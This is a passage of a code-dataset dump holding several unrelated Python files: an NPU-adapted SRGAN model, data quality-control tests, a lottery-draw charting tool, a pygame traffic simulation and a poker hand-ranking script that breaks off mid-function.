math\nimport torch\nif torch.__version__ >= '1.8':\n import torch_npu\nfrom torch import nn\n\n\nclass Generator(nn.Module):\n def __init__(self, scale_factor):\n upsample_block_num = int(math.log(scale_factor, 2))\n\n super(Generator, self).__init__()\n # self.block1 = nn.Sequential(\n # nn.Conv2d(3, 64, kernel_size=9, padding=4),\n # nn.PReLU()\n # )\n self.block0 = nn.Conv2d(3, 64, kernel_size=9, padding=4)\n self.block1 = nn.PReLU()\n self.block2 = ResidualBlock(64)\n self.block3 = ResidualBlock(64)\n self.block4 = ResidualBlock(64)\n self.block5 = ResidualBlock(64)\n self.block6 = ResidualBlock(64)\n self.block7 = nn.Sequential(\n nn.Conv2d(64, 64, kernel_size=3, padding=1),\n nn.BatchNorm2d(64)\n )\n block8 = [UpsampleBLock(64, 2) for _ in range(upsample_block_num)]\n block8.append(nn.Conv2d(64, 3, kernel_size=9, padding=4))\n self.block8 = nn.Sequential(*block8)\n\n def forward(self, x):\n # block1 = self.block1(x)\n block0 = self.block0(x)\n block1 = self.block1(torch_npu.npu_format_cast(block0, 2))\n block2 = self.block2(block1)\n block3 = self.block3(block2)\n block4 = self.block4(block3)\n block5 = self.block5(block4)\n block6 = self.block6(block5)\n block7 = self.block7(block6)\n block8 = self.block8(block1 + block7)\n\n return (torch.tanh(block8) + 1) / 2\n\n\nclass Discriminator(nn.Module):\n def __init__(self):\n super(Discriminator, self).__init__()\n self.net = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=3, padding=1),\n nn.LeakyReLU(0.2),\n\n nn.Conv2d(64, 64, kernel_size=3, stride=2, padding=1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(0.2),\n\n nn.Conv2d(64, 128, kernel_size=3, padding=1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(0.2),\n\n nn.Conv2d(128, 128, kernel_size=3, stride=2, padding=1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(0.2),\n\n nn.Conv2d(128, 256, kernel_size=3, padding=1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(0.2),\n\n nn.Conv2d(256, 256, kernel_size=3, stride=2, padding=1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(0.2),\n\n nn.Conv2d(256, 512, kernel_size=3, padding=1),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(0.2),\n\n nn.Conv2d(512, 512, kernel_size=3, stride=2, padding=1),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(0.2),\n\n 
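# global average pooling collapses the feature map to 1x1; the 1x1 convolutions that follow act as the classifier head\n            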
nn.AdaptiveAvgPool2d(1),\n nn.Conv2d(512, 1024, kernel_size=1),\n # nn.BatchNorm2d(1024),\n nn.LeakyReLU(0.2),\n nn.Conv2d(1024, 1, kernel_size=1)\n )\n\n def forward(self, x):\n batch_size = x.size(0)\n return torch.sigmoid(self.net(x).view(batch_size))\n\n\nclass ResidualBlock(nn.Module):\n def __init__(self, channels):\n super(ResidualBlock, self).__init__()\n self.conv1 = nn.Conv2d(channels, channels, kernel_size=3, padding=1)\n self.bn1 = nn.BatchNorm2d(channels)\n self.prelu = nn.PReLU()\n self.conv2 = nn.Conv2d(channels, channels, kernel_size=3, padding=1)\n self.bn2 = nn.BatchNorm2d(channels)\n\n def forward(self, x):\n residual = self.conv1(x)\n residual = self.bn1(residual)\n # residual = self.prelu(residual)\n residual = self.prelu(torch_npu.npu_format_cast(residual, 2))\n residual = self.conv2(residual)\n residual = self.bn2(residual)\n\n return x + residual\n\n\nclass UpsampleBLock(nn.Module):\n def __init__(self, in_channels, up_scale):\n super(UpsampleBLock, self).__init__()\n self.conv = nn.Conv2d(in_channels, in_channels * up_scale ** 2, kernel_size=3, padding=1)\n self.pixel_shuffle = nn.PixelShuffle(up_scale)\n self.prelu = nn.PReLU()\n\n def forward(self, x):\n x = self.conv(x)\n x = self.pixel_shuffle(x)\n # x = self.prelu(x)\n x = self.prelu(torch_npu.npu_format_cast(x, 2))\n return x\n\nif __name__ == '__main__':\n NetG = Generator(4)\n print(NetG)\n # print('----------------------------------------------------------------------------------------')\n # NetD = Discriminator()\n # print(NetD)\n","sub_path":"PyTorch/contrib/cv/others/SRGAN/model_test.py","file_name":"model_test.py","file_ext":"py","file_size_in_byte":4987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"248523094","text":"def persist_test(value,max_diff,min_stddev):\n '''\n Checks to see if there are repeat values in the data\n '''\n #Create a dataframe to store the values\n columns = ['date','value','max_diff','max_diff_result',\n 'min_stddev', 'min_stddev_result', 'result']\n df = pd.DataFrame(index=value.index, columns = columns)\n\n #Create a column to detail the date\n df['date'] = [(str(t.year)+ '-' + str(t.month) +'-' + str(t.day)) \\\n for t in df.index]\n df['value'] = value\n df['max_diff'] = max_diff\n df['min_stddev'] = min_stddev\n\n #Use lambda functions to calculate differences\n max_diff_f = lambda x: np.less_equal((x.max() - x.min()), max_diff)\n min_stddev_f = lambda x: np.greater_equal(x.std(), min_stddev)\n final_f = lambda x: np.logical_and(max_diff_f(x), min_stddev_f(x))\n\n #Group together by date\n grouped = df.groupby('date')\n md = grouped['value'].apply(max_diff_f)\n ms = grouped['value'].apply(min_stddev_f)\n pt = grouped['value'].apply(final_f)\n\n df['max_diff_result'] = True\n df['max_diff_result'] = df.apply(lambda row: _passed(row['date'], md), axis = 1)\n\n df['min_stddev_result'] = True\n df['min_stddev_result'] = df.apply(lambda row: _passed(row['date'], ms), axis = 1)\n\n df['result'] = df.apply(lambda row: _passed(row['date'], pt), axis =1)\n\n return df\n\ndef pre_range_test1(value, max_value, min_value):\n try:\n df = pd.DataFrame(index = value.index, columns = ['value', 'max_value', 'min_value', 'result'])\n df['value'] = value\n df['max_value'] = max_value\n df['min_value'] = min_value\n\n l = np.less_equal(value, max_value)\n g = np.greater_equal(value, min_value)\n\n df['result'] = np.logical_and(l,g)\n except Exception as e:\n sys.stderr.write(str(e) + '\\n')\n df = False\n\n return df\n\ndef test(value, 
max_value, min_value):\n #Checks to see if test function parameters are floats or integers\n _iif = lambda x: isinstance(x, (int,float))\n\n try:\n if isinstance(value,pd.Series):\n result = _pdtest(value, max_value, min_value)\n elif (_iif(value)) and (_iif(max_value)) and (_iif(min_value)):\n if value >= min_value and value <= max_value:\n result = True\n\n except Exception as e:\n sys.stderr.write(str(e) + '\\n')\n\n return result\n\ndef range_test(value, max_value, min_value):\n return(test(value, max_value, min_value))\n\ndef step_test(value,max_diff,num_steps=1):\n try:\n columns = ['value', 'prev_value', 'max_diff', 'num_steps', 'result']\n df = pd.DataFrame(index = value.index, columns = columns)\n prev_value = value[1:]\n df['value'] = value[:-1]\n df['prev_value'] = prev_value\n df['max_diff'] = max_diff\n df['num_steps'] = num_steps\n\n value = value[:-1]\n d = value - prev_value\n a = np.fabs(d)\n\n df['result'] = np.less_equal(a, max_diff)\n except:\n df = False\n return df\n","sub_path":"qa_qc_tests.py","file_name":"qa_qc_tests.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"394600353","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nfrom collections import namedtuple, OrderedDict\nimport csv\nimport datetime\nimport itertools\nimport matplotlib.pyplot as plt\nfrom operator import itemgetter\nimport os.path\nimport string\nimport sys\nimport logging\n\n# ----- Constants ------\n\n(MON, TUE, WED, THU, FRI, SAT, SUN) = range(7) # same as datetime.weekday()\nDAY_COMBINATIONS = ((SAT,), (MON,), (TUE,), (WED,),\n (SAT, MON), (SAT, TUE), (SAT, WED), (MON, TUE), (TUE, WED),\n (MON, WED))\nDAY_STRINGS = {MON: 'Mon', TUE: 'Tue', WED: 'Wed', THU: 'Thu', FRI: 'Fri',\n SAT: 'Sat', SUN: 'Sun'}\nWHITE = '#FFFFFE'\nGOLD = '#FFFF00'\nBLUE = '#66CCFF'\nPINK = '#FF6FCF'\nGREEN = '#66FF66'\n\n\n# ------ Classes -------\n\nclass Draw(namedtuple('Draw', 'draw_num date numbers lowest highest')):\n \"\"\"A sequence of integers identified by a date and draw number.\"\"\"\n pass\n\n\nclass DrawChart(object):\n \"\"\"A chart containing Draws with formatting information.\"\"\"\n DRAWN_STR = '•'\n NOT_DRAWN_STR = ''\n TEXT_COLS = 2 # date and filename\n TALLY_COLORS = OrderedDict([[GOLD, 'Gold'], [BLUE, 'Blue'], [PINK, 'Pink'],\n [GREEN, 'Green']])\n # Each rule tuple contains required cells with the previous cell at\n # position 0, earlier cells at higher indexes.\n # i.e. 
row -1 -2 -3 -4\n COLOR_RULES = OrderedDict([[(True, True), GREEN],\n [(False, False, True), PINK],\n [(False, True), BLUE],\n [(True, ), GOLD]])\n HEADER_HEIGHT = 1\n FOOTER_HEIGHT = 1 + len(COLOR_RULES) # draw percentages + color tallies\n\n def __init__(self, results, num_range):\n self.results = results\n self.draws = tuple(itertools.chain(*self.results.values()))\n self.lowest, self.highest = num_range\n (self.header, self.body, self.colors, self.footer, self.width,\n self.height) = self.process()\n\n def process(self):\n \"\"\"Create chart from draws in self.results.\"\"\"\n header = self.create_header()\n body = self.create_matrix()\n colors = self.create_color_matrix(body)\n footer = self.create_footer(colors)\n width = len(body[0])\n height = len(header) + len(body) + len(footer)\n return (header, body, colors, footer, width, height)\n\n def create_header(self):\n \"\"\"Return the header rows for this chart.\"\"\"\n return [['Date', 'File'] + list(range(self.lowest, self.highest + 1))]\n\n def create_matrix(self):\n \"\"\"Return matrix of processed draw information.\"\"\"\n matrix = []\n for fn, draws in self.results.items():\n for draw in draws:\n row = [draw.date, fn]\n row.extend([num in draw.numbers for\n num in range(self.lowest, self.highest + 1)])\n matrix.append(row)\n\n # Sort by date, then filename within date.\n date_col, file_col = 0, 1\n matrix.sort(key=itemgetter(date_col, file_col))\n return matrix\n\n def create_footer(self, colors):\n \"\"\"Return footer rows for this chart.\"\"\"\n return [self.draw_percentages_row()] + self.tallies_footer(colors)\n\n def draw_percentages_row(self):\n \"\"\"Return the draw percentages row for this chart.\"\"\"\n pcts = [self.calc_draw_percentage(n) for\n n in range(self.lowest, self.highest + 1)]\n return list(itertools.chain(['', 'Draw %'], pcts))\n\n def calc_draw_percentage(self, n):\n \"\"\"Return the draw percentage for number n.\"\"\"\n opps = len(self.draws)\n if opps == 0:\n return '' # number not in play (division by zero)\n times_drawn = sum((draw.numbers.count(n) for draw in self.draws))\n return '{:.4f}%'.format(times_drawn / opps)\n\n def tallies_footer(self, color_matrix):\n \"\"\"Return a 2D list of strings containing color counts by column.\"\"\"\n colors, names = zip(*self.TALLY_COLORS.items())\n tallies = [[''] * len(colors)] # column major order\n tallies.extend([names])\n transposed = list(zip(*color_matrix))\n for column in itertools.islice(transposed, self.TEXT_COLS, None):\n tallies.append([column.count(color) for color in colors])\n return list(zip(*tallies))\n\n def create_color_matrix(self, body):\n \"\"\"Create a matrix of colors according to predefined rules.\n\n Coloring rules:\n Each cell in the area of the matrix defined by start_row,\n start_col, and has_footer is colored depending on the cells in\n the same column in the rows above.\n\n Returns:\n 2D list of strings/None: A 2D list of the same dimensions as\n matrix, where each cell in the area defined by start_row,\n start_col, and has_footer is one of (None, GOLD, BLUE, PINK,\n GREEN).\n\n \"\"\"\n start_col = self.TEXT_COLS\n max_rule_length = max((len(rule) for rule in self.COLOR_RULES.keys()))\n width = len(body[0])\n height = len(body)\n transposed = list(zip(*body))\n colors = [[WHITE for row in range(height)] for\n col in range(width)] # column major order\n for row in range(height):\n for col in range(start_col, width):\n if not body[row][col]:\n continue # cell is empty\n fourth_previous = max(row - max_rule_length, 0)\n previous_cells = 
transposed[col][fourth_previous:row]\n previous_cells = tuple(reversed(previous_cells))\n colors[col][row] = self.calc_color(previous_cells,\n self.COLOR_RULES)\n colors = list(zip(*colors))\n # add header and footer rows\n colors = [[WHITE for col in range(width)] for\n row in range(self.HEADER_HEIGHT)] + colors\n colors += [[WHITE for col in range(width)] for\n row in range(self.FOOTER_HEIGHT)]\n return colors\n\n def calc_color(self, previous_cells, rules):\n \"\"\"Calculate the color for a given cell.\"\"\"\n for rule, color in rules.items():\n if len(previous_cells) < len(rule):\n continue\n for check_cell, correct_cell in zip(previous_cells, rule):\n if check_cell != correct_cell:\n break\n else:\n return color # found a match\n return WHITE\n\n def cell_text(self):\n \"\"\"Return 2D list of strings representing this chart.\"\"\"\n cells = []\n for row in self.body:\n row_text = row[:self.TEXT_COLS]\n row_text.extend([self.DRAWN_STR if cell else self.NOT_DRAWN_STR for\n cell in row[self.TEXT_COLS:]])\n cells.append(row_text)\n return self.header + cells + self.footer\n\n\nclass Reader(object):\n \"\"\"A reader for CSV files containing lottery data.\"\"\"\n DRAW_NUM_HEADING = 'Format: Draw Number'.lower()\n DATE_HEADING = 'Draw Date (yyyymmdd)'.lower()\n FIRST_NUM_HEADING = 'Winning Number 1'.lower()\n DELIMITERS = (',', ';', '\\t') # expected CSV delimiters\n MAX_DRAWN_NUMBERS = 9 # OzLotto has 7 + 2 supps\n\n def __init__(self, filenames, use_headings, abort_on_error, num_range):\n self.filenames = filenames\n self.use_headings = use_headings\n self.abort = abort_on_error\n self.num_range = num_range\n\n def read_files(self):\n \"\"\"Return a dictionary mapping filenames to lists of Draws.\"\"\"\n self.validate_filenames()\n results = {fn: self.read_file(fn) for fn in self.filenames}\n results = process_filenames(results)\n results = {fn: draws for fn, draws in results.items() if draws}\n if len(results) < 1:\n print('ERROR: No results found in input files.')\n sys.exit(1)\n return results\n\n def read_file(self, filename):\n \"\"\"Read a CSV file of Lotto Draws.\n\n Returns:\n list of Draws: Every Draw read from the input file.\n\n \"\"\"\n try:\n with open(filename, newline='') as f:\n dialect = csv.Sniffer().sniff(f.readline(), self.DELIMITERS)\n f.seek(0)\n csv_reader = csv.reader(f, dialect)\n headings_row = [h.strip() for h in csv_reader.__next__()]\n if self.use_headings:\n return self.read_by_headings(csv_reader, headings_row)\n return self.read_by_order(csv_reader)\n except IOError as err:\n print('ERROR: Cannot read from input file {}.'.format(filename))\n print(err)\n if self.abort:\n sys.exit(1)\n return None\n\n def read_by_headings(self, csv_reader, headings_row):\n \"\"\"Return a list of Draws read from csv_reader where column types\n are identified by the column's first cell.\"\"\"\n headings_lower = [h.strip().lower() for h in headings_row]\n draw_num_col = headings_lower.index(self.DRAW_NUM_HEADING)\n date_col = headings_lower.index(self.DATE_HEADING)\n first_num_col = headings_lower.index(self.FIRST_NUM_HEADING)\n return self.read_by_order(csv_reader, draw_num_col, date_col,\n first_num_col)\n\n def read_by_order(self, csv_reader, draw_num_col=0, date_col=1,\n first_num_col=2):\n \"\"\"Return a list of Draws read from csv_reader where column types\n are identified by index.\n\n Reads columns from first_num_col onward as drawn numbers until a\n cell containing anything other than an integer or hyphen is\n found or MAX_DRAWN_NUMBERS numbers have been read.\n\n Dates 
are expected to be in the format 'yyyymmdd'.\n\n \"\"\"\n lowest, highest = self.num_range\n draws = []\n for row in csv_reader:\n draw_num = int(row[draw_num_col])\n date = date_from_str(row[date_col])\n numbers = []\n last_col = min(self.MAX_DRAWN_NUMBERS + first_num_col, len(row))\n for cell in row[first_num_col:last_col]:\n if all((ch in string.digits for ch in cell)):\n numbers.append(int(cell))\n elif cell != '-': # numbers may be separated by hyphens\n break\n draws.append(Draw(draw_num, date, numbers, lowest, highest))\n return draws\n\n def validate_filenames(self):\n \"\"\"Check that each filename ends with the .csv extension.\"\"\"\n # Iterate over a copy so removing bad filenames does not skip entries.\n for fn in list(self.filenames):\n if len(fn) < 5 or not fn.lower().endswith('.csv'):\n print('ERROR: File {} missing .csv extension.'.format(fn))\n if self.abort:\n sys.exit(1)\n self.filenames.remove(fn)\n\n\nclass Writer(object):\n \"\"\"PNG Image writer for analysed lottery data.\"\"\"\n DATE_COL = 0\n FILE_COL = 1\n\n # matplotlib table formatting is poorly supported, so the\n # table dimensions were found by trial and error. These\n # dimensions look best when the game draws from 45 numbers and\n # start to look unpresentable at around 50 numbers. The page width\n # was chosen to be close to a multiple of the width of an A4 sheet\n # of paper.\n # Unfortunately, text size cannot be predicted before rendering so\n # filenames that are too long must be truncated.\n DIMS = {'row_width': 16, # inches\n 'cell_height': 0.28,\n 'footer_height': 0.6,\n 'num_width': 0.29,\n 'date_width': 1.1,\n 'file_width': 1.3,\n 'max_filename': 23} # characters\n\n FONT_SIZES = {'default': 12.0, # points\n 'headings': 14.0,\n 'bullets': 24.0,\n 'draw_percentages': 10.0}\n\n FONT_WEIGHTS = {'text_headings': 'bold',\n 'num_headings': 'medium'}\n\n def __init__(self, chart, dpi):\n self.chart = chart\n self.dpi = dpi # image resolution in dots per inch\n\n def format(self, table):\n \"\"\"Format table for output to image file.\"\"\"\n self.truncate_filenames(table)\n rotate_footer_text(table, self.chart.FOOTER_HEIGHT)\n self.resize_table(table)\n self.format_text(table)\n\n def truncate_filenames(self, table):\n \"\"\"Truncate filenames that won't fit in the file column.\"\"\"\n for (_, col), cell in table.get_celld().items():\n if col == self.FILE_COL:\n text = cell.get_text()\n filename = text.get_text()\n shortened = filename[:self.DIMS['max_filename']]\n text.set_text(shortened)\n\n def resize_table(self, table):\n \"\"\"Resize the pyplot cells according to Writer cell\n dimensions.\"\"\"\n # Store width so we can restore table size after resizing cells,\n # in case the sum of dimensions in self.DIMS is not 1.0.\n initial_width = calc_table_width(table)\n\n for (row, col), cell in table.get_celld().items():\n self.resize_cell(cell, row, col)\n\n # Scale table width back to original value.\n final_width = calc_table_width(table)\n x_scale = initial_width / final_width\n table.scale(x_scale, 1.0)\n\n def resize_cell(self, cell, row, col):\n \"\"\"Resize a single cell.\"\"\"\n if row == self.chart.height - self.chart.FOOTER_HEIGHT:\n # first row of the footer (draw percentage)\n cell.set_height(self.DIMS['footer_height'])\n else:\n cell.set_height(self.DIMS['cell_height'])\n if col == self.DATE_COL:\n cell.set_width(self.DIMS['date_width'])\n elif col == self.FILE_COL:\n cell.set_width(self.DIMS['file_width'])\n else:\n cell.set_width(self.DIMS['num_width'])\n\n def format_text(self, table):\n \"\"\"Set font sizes and weights.\"\"\"\n table.auto_set_font_size(False)\n for 
(row, col), cell in table.get_celld().items():\n font_size, weight = self.cell_font_size_weight(row, col)\n text = cell.get_text()\n text.set_fontsize(font_size)\n text.set_weight(weight)\n\n def cell_font_size_weight(self, row, col):\n \"\"\"Return the font size and weight for the cell at (row, col)\n according to predetermined constants.\"\"\"\n is_heading = row == 0\n is_footer = row > self.chart.height - self.chart.FOOTER_HEIGHT\n is_text = col < self.chart.TEXT_COLS or is_footer\n is_draw_percentage = (row == self.chart.height -\n self.chart.FOOTER_HEIGHT and\n col >= self.chart.TEXT_COLS)\n font_size = None\n weight = None\n if is_heading:\n font_size = self.FONT_SIZES['headings']\n if is_text:\n weight = self.FONT_WEIGHTS['text_headings']\n else:\n weight = self.FONT_WEIGHTS['num_headings']\n elif is_draw_percentage:\n font_size = self.FONT_SIZES['draw_percentages']\n else:\n if is_text:\n font_size = self.FONT_SIZES['default']\n else:\n font_size = self.FONT_SIZES['bullets']\n return font_size, weight\n\n def write(self, filename):\n \"\"\"Write the results to a PNG image file.\"\"\"\n cell_text = self.chart.cell_text()\n\n # Create axes that take up the entire area and add a table.\n plt.figure(figsize=(self.DIMS['row_width'],\n self.DIMS['cell_height'] * 5))\n ax = plt.axes([0, 0, 1, 1])\n table = ax.table(cellText=cell_text,\n cellColours=self.chart.colors,\n cellLoc='center',\n loc='center')\n self.format(table)\n ax.axis('off') # hide the axes that come with every plot\n logging.debug('Saving {}...'.format(filename))\n plt.savefig(filename, dpi=self.dpi, bbox_inches='tight')\n plt.close('all')\n logging.debug('done.')\n\n\n# ----- Functions ------\n\ndef process_filenames(results):\n \"\"\"Process filenames for output.\n\n 1. '/path/to/filename.csv' -> 'filename'\n 2. 'OzLotto' (any case) -> 'Oz'\n 3. 'Tattslotto' (any case) -> 'Tattslotto'\n 4. 
'MondayWednesdayLotto' -> 'Monday' and 'Wednesday'\n\n \"\"\"\n for old_fn, draws in list(results.items()):\n new_fn = strip_path_ext(old_fn)\n if new_fn.lower() == 'ozlotto':\n new_fn = 'Oz'\n elif new_fn.lower() == 'tattslotto':\n new_fn = 'Tattslotto'\n results[new_fn] = draws\n del results[old_fn]\n return separate_mon_wed(results)\n\n\ndef strip_path_ext(filename):\n \"\"\"Return a string containing the filename without path or\n extension.\"\"\"\n return os.path.splitext(os.path.basename(filename))[0]\n\n\ndef separate_mon_wed(results, mon_wed_fn='MondayWednesdayLotto'):\n \"\"\"Return results with values that were under key mon_wed_fn split\n between the two keys 'Monday' and 'Wednesday' depending on their\n date.\"\"\"\n draws = results.get(mon_wed_fn, None)\n if not draws:\n return results\n del results[mon_wed_fn]\n results['Monday'] = [d for d in draws if d.date.weekday() == MON]\n results['Wednesday'] = [d for d in draws if d.date.weekday() == WED]\n return results\n\n\ndef date_from_str(s):\n \"\"\"Return a date object from a string in the format 'yyyymmdd'.\"\"\"\n year = int(s[:4])\n month = int(s[4:6])\n day = int(s[6:])\n return datetime.date(year, month, day)\n\n\ndef last_date(results):\n \"\"\"Return the timedate.Date for the latest date in results.\"\"\"\n draws = tuple(itertools.chain(*results.values()))\n if not draws:\n return None\n return max(draws, key=lambda d: d.date).date\n\n\ndef calc_table_width(table):\n \"\"\"Return the width of matplotlib table in inches.\"\"\"\n return sum((cell.get_width() for cell in table.get_celld().values()))\n\n\ndef rotate_footer_text(table, n, start_col=2):\n \"\"\"Rotate the text in the -nth row of the table clockwise 90 degrees.\n\n Args:\n table (matplotlib table)\n\n \"\"\"\n row_num = sorted({row for (row, _) in table.get_celld().keys()})[-n]\n cells = (cell for (row, col), cell in table.get_celld().items() if\n row == row_num and col >= start_col)\n for cell in cells:\n text = cell.get_text()\n text.set_rotation(270)\n\n\ndef generate_filename(days, last_date, ext='.png'):\n \"\"\"Return a unique image filename for these days and date.\"\"\"\n first_day = SAT # starting day of the week for sorting\n sorted_days = sorted(days, key=lambda d: (d - first_day) % 7)\n days_str = '_'.join((DAY_STRINGS[day] for day in sorted_days))\n date_str = str(last_date).replace('-', '_')\n filename = '_'.join((date_str, days_str))\n return ''.join((filename, ext))\n\n\ndef filter_by_weekdays(results, days):\n \"\"\"Return results with only the draws that fall on a day in days.\"\"\"\n filtered = {fn: [draw for draw in draws if draw.date.weekday() in days] for\n fn, draws in results.items()}\n days_found = set()\n for draws in filtered.values():\n days_found.update({d.date.weekday() for d in draws})\n if len(days_found) < len(days):\n return {} # these entries will be covered by another days tuple\n return filtered\n\n\ndef filter_by_cutoff_date(results, weeks):\n \"\"\"Return results with only the draws from after (last draw - weeks).\"\"\"\n if results == {}:\n return {}\n cutoff = last_date(results) - datetime.timedelta(weeks=weeks)\n return {fn: [draw for draw in draws if draw.date > cutoff] for\n fn, draws in results.items()}\n\n\ndef filter_results(results, days, weeks):\n \"\"\"Return results with only the draws within the last \"weeks\" weeks\n that land on a day in days.\n\n Returns:\n dict (str: list of Draws): results filtered by days and weeks.\n\n \"\"\"\n filtered = filter_by_weekdays(results, days)\n filtered = 
filter_by_cutoff_date(filtered, weeks)\n return {fn: draws for fn, draws in filtered.items() if draws}\n\n\ndef parse_args():\n \"\"\"Parse arguments and perform simple validation.\"\"\"\n parser = argparse.ArgumentParser()\n parser.description = ('Process and chart lottery data. '\n 'Requires matplotlib.')\n parser.add_argument('inputfiles', nargs='+',\n help='CSV file(s) to process')\n parser.add_argument('-a', '--abort-on-error', action='store_true',\n help='exit if an input file cannot be read')\n parser.add_argument('-u', '--use-headings', action='store_true',\n help='read CSV columns by their headings '\n 'rather than their order')\n parser.add_argument('-n', '--number-range', type=int, nargs=2,\n default=[1, 45], metavar=('LOW', 'HIGH'),\n help='the range (inclusive) of numbers that '\n 'may be drawn (default is 1 45)')\n parser.add_argument('-r', '--resolution', type=int, default=120,\n metavar='DPI',\n help='output resolution in dots per inch '\n '(default is 120)')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='show progress as files are created')\n parser.add_argument('-w', '--weeks', type=int, default=104,\n help='number of weeks to process from last '\n 'date in inputfiles (default is 104)')\n\n # swap LOW and HIGH if necessary\n args = parser.parse_args()\n low, high = args.number_range\n if low > high:\n args.number_range.reverse()\n return args\n\n\ndef main():\n args = parse_args()\n\n # import all the draws from csv\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG)\n logging.debug('Reading input files...')\n reader = Reader(args.inputfiles, args.use_headings,\n args.abort_on_error, args.number_range)\n draws = reader.read_files()\n logging.debug('done.')\n\n # generate an image for every combination of days\n for days in DAY_COMBINATIONS:\n days_results = filter_results(draws, days, args.weeks)\n if len(days_results) == 0:\n continue\n chart = DrawChart(days_results, args.number_range)\n writer = Writer(chart, args.resolution)\n filename = generate_filename(days, last_date(days_results))\n writer.write(filename)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"lotto.py","file_name":"lotto.py","file_ext":"py","file_size_in_byte":22626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"73888125","text":"from assets import *\n\npygame.init()\n\nFPS = 30\nfpsClock = pygame.time.Clock()\n\nstart = [400, 400]\nend = [2000, 400]\n\nroad = Road(0, start, end, 10, 3)\nroad2 = Road(1, end, [2100, 400], 1, 3)\nroad3 = Road(2, [2100, 400], [10000, 400], 10, 3)\nmodel.road_list = [road, road2, road3]\n\ncar = Vehicle(0, [400, 405], 0, [50, 25], RED, 0.2, 0.3, 1, 200, 100, 0, 5, 0, 0, 0.5, 30, None)\ncar2 = Vehicle(1, [500, 405], 0, [50, 25], BLUE, 0.1, 0.3, 1, 200, 100, 10, 5, 0, 0, 0.5, 30, None)\n#car3 = Vehicle(2, [1000, 405], 0, [50, 25], GREEN, 0, 0.3, 1, 200, 100, 5, 5, 0, 0, 0.5, 30, None)\nmodel.veh_list = [car, car2]\n\nmodel.populate_veh_lists()\n\nDISPLAYSURF = pygame.display.set_mode((800, 800), 0, 32)\npygame.display.set_caption('Road Traffic Simulation')\n\nwhile True:\n DISPLAYSURF.fill(WHITE)\n\n for road in model.road_list:\n road.draw(DISPLAYSURF)\n\n for vehicle in model.veh_list:\n vehicle.update()\n vehicle.draw(DISPLAYSURF)\n\n model.handle_events()\n\n #bend = Bend([500, 500], pygame.mouse.get_pos(), math.pi)\n #DISPLAYSURF.blit(bend.image, bend.blit_pos)\n\n pygame.display.update()\n 
fpsClock.tick(FPS)","sub_path":"old/run_model.py","file_name":"run_model.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"484474036","text":"from random import shuffle, randrange\nfrom itertools import combinations \n\nsuits = ['S', 'H', 'C', 'D']\ncards = [str(i) for i in range(2, 10)]\ncards.extend(['T', 'J', 'Q', 'K', 'A'])\n\n\ndef get_deck(shuffle_deck=True):\n deck = []\n for suit in suits:\n for card in cards:\n deck.append([card, suit])\n if shuffle_deck:\n shuffle(deck)\n return deck\n\n\ndef draw_cards(deck, nbr_of_cards):\n if len(deck) < nbr_of_cards:\n raise Exception(\n \"Requested number of cards cannot exceed the size of the deck\")\n card_idx = set()\n while len(card_idx) < nbr_of_cards:\n card_idx.add(randrange(len(deck)))\n drawn_cards = []\n for idx in card_idx:\n drawn_cards.append(deck[idx])\n return drawn_cards\n\n\ndef draw_cards_from_deck(deck: list, nbr_of_cards: int):\n if len(deck) < nbr_of_cards:\n raise Exception(\n \"Requested number of cards cannot exceed the size of the deck\")\n card_idx = set()\n while len(card_idx) < nbr_of_cards:\n card_idx.add(randrange(len(deck)))\n drawn_cards = []\n for idx in card_idx:\n drawn_cards.append(deck[idx])\n for drawn_card in drawn_cards:\n deck.remove(drawn_card)\n\n return deck, drawn_cards\n\n\n# Test function that checks the ranking of hands\n\n\ndef compare_players(nbr_of_players, cards):\n deck = get_deck(True)\n #drawn_cards = draw_cards(deck, 5 * nbr_of_players)\n \n table = []\n winner = []\n for x in range(5):\n table.append(cards.pop(nbr_of_players*2))\n for i in range(nbr_of_players):\n current_cards = []\n results = []\n #current_cards = drawn_cards[i * 5: (i+1) * 5]\n current_cards.append(cards.pop(0))\n current_cards.append(cards.pop(0))\n for x in range(5):\n current_cards.append(table[x])\n comb = combinations(current_cards, 5)\n for y in list(comb):\n rank = check_hand_rank(y)\n results.append(rank)\n #results.append(check_hand_rank(drawn_cards[i * 5 : (i+1) * 5]))\n #for res in results:\n # print(res)\n \n winner.append(results[0])\n # keep the best ranked of every remaining 5-card combination\n for j in range(1, len(results)):\n if results[j][\"rank\"] > winner[i][\"rank\"]:\n winner[i] = results[j]\n elif results[j][\"rank\"] == winner[i][\"rank\"]:\n if results[j][\"score\"] > winner[i][\"score\"]:\n winner[i] = results[j]\n #print(winner[i])\n win_final = winner[0]\n win_player = 0\n for i in range(1, nbr_of_players):\n if winner[i][\"rank\"] > win_final[\"rank\"]:\n win_final = winner[i]\n win_player = i\n return win_player#winner\n\n\ndef get_hand_rank(hand):\n return ['--23456789TJQKA'.index(n) for n, h in hand]\n\n\ndef get_card_rank(card):\n return '--23456789TJQKA'.index(card)\n\n\ndef royal_straight_flush(hand):\n def royal_straight(hand):\n n = [n for n, h in hand]\n for c in n:\n if c not in ['A', 'K', 'Q', 'J', 'T'] or len(set(n)) != 5:\n return False\n return True\n return royal_straight(hand) and flush(hand)[\"result\"]\n\n\ndef high_card(hand):\n card_rank = ['--23456789TJQKA'.index(n) for n, h in hand]\n card_rank.sort()\n card_rank.reverse()\n return max(card_rank)\n\n\ndef one_pair(hand):\n card_rank = get_hand_rank(hand)\n pair_rank = -1\n for i in range(len(card_rank)):\n if card_rank.count(card_rank[i]) == 2:\n pair_rank = card_rank[i]\n break\n return {\"result\": len(set(card_rank)) == 4, 